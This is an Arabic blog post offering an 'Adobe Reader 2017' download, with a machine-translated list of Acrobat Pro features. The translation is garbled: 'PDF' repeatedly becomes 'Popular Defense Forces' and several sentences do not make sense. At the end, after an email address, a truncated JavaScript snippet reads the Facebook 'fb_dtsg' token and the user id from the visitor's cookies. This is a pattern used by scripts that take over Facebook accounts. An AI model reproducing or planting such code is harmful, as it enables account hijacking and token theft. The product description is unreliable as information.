jeudi 23 février 2017

تحميل برنامج 2017adobe reader



تحميل برنامج 2017adobe reader
نتيجة بحث الصور عن ‪adobe reader‬‏

هناك العديد من الخيارات للقراءة وتحرير وثائق PDF في الوقت الحاضر ولكن أدوبي أكروبات برو الأولى. هذا الإصدار من الفئة الفنية من البرنامج يتيح لك القدرة على إنشاء وقراءة وتعديل وثائق PDF.
أدوبي أكروبات برو العاصمة يمنحك عدة وجهات نظر مختلفة لقراءة وثائق PDF بما في ذلك درجات مختلفة من التكبير. الأهم من ذلك، فإنه يسمح لك لتحرير الوثائق، والتعليق عليها، إضافة الطوابع والعلامات المائية والتوقيعات وكذلك تصديرها إلى مجموعة متنوعة من الأشكال بما في ذلك HTML والتذييل.
يمكنك إنشاء ملفات PDF من مجموعة متنوعة من المصادر، بما في ذلك الملفات والوثائق الممسوحة ضوئيا وصفحات الويب. يمكنك أيضا الجمع بين ودمج المستندات، إنشاء محفظة PDF واستخدام مجموعة متنوعة من الأدوات لإضافة الوسائط المتعددة، وإنشاء نماذج PDF، إضافة التوقيعات الرقمية وأكثر من ذلك بكثير.
جمع كبير من أدوبي أكروبات برو هو أنه يدعم أيضا التعرف الضوئي على الحروف المسح الضوئي للمستندات. هذا يعني أنه يمكنك مسح مستند إلى جهاز الكمبيوتر الخاص بك، وسوف أدوبي أكروبات X تحويلها إلى نص قابل للتعديل. دقة وسرعة من هذه الميزة الرائعة ويلغي الحاجة إلى برنامج التعرف الضوئي على الحروف طرف ثالث. يبقى الجانب السلبي الكبير الذي أدوبي أكروبات برو DC يمكن أن يكون بطيئا للغاية في البداية وعملية التثبيت طويلة بعض الشيء.
أدوبي أكروبات برو العروض كل الأدوات التي ستحتاج إليها من أي وقت مضى لإدارة وتحرير وثائق PDF.التغييرات

    
وقف إعادة كتابة المعلومات في قوات الدفاع الشعبي filesTurn قوات الدفاع الشعبي في ملف Microsoft Office الأصلي، وتوفير الخطوط والتنسيق، وطن من الوقت.؟
    
تحرير النصوص والصور الحق في ملف PDF - إجراء تغييرات طفيفة على النص والصور على صفحات PDF. لا حاجة لتعقب الوثيقة الأصلية.؟
    
بناء النماذج وجمع البيانات بشكل أسرع - سحب وإسقاط لإنشاء قوات الدفاع الشعبي على شبكة الإنترنت أو الأشكال في غضون دقائق. ثم نقلها على الانترنت لسهولة التوزيع، وجمع، وتحليل.
    
تبادل الوثائق التي تبدو الحق في كل مرة - لم يكن يوما أسهل لحفظ عملك على شكل ملفات PDF التي يمكن لأي شخص فتح 

وعرض

email

ssdfqsdfcd@gmail.com (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(docume...